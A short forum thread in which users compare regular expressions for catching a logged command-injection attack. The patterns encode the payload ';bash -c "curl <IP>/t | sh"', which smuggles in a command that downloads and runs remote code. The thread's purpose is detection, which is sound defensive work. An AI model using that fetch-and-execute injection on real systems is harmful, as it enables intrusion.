Hello,
what is proper expression? I tried
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\"
but still error logs payload missing: SA ...
Thanks.
what is proper expression? I tried
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\\/t \\| sh\";echo -n
- ;bash -c \"curl [0-9]+\\.[0-9]+\\.[0-9]+\\.[0-9]+\"
but still error logs payload missing: SA ...
Thanks.
It's funny to find on the Internet my own solution, which I published on another resource.
But this is not a complete solution.
1) There is an error in the syntax, see point 2.
2) This expression was created as a test expression to exclude THEORETICAL false positives, еherefore, it does not catch similar attacks with another instruction. Right now I'm using the expression ;bash -c "curl [0-9]+\.[0-9]+\.[0-9]+\.[0-9]
3) it protects against payload messing:sa. What kind of payload missing: nonce I don't know at the moment and want to know. The day before yesterday I caught 2 events.
Statistics: Posted by durip — Tue Dec 26, 2023 7:44 pm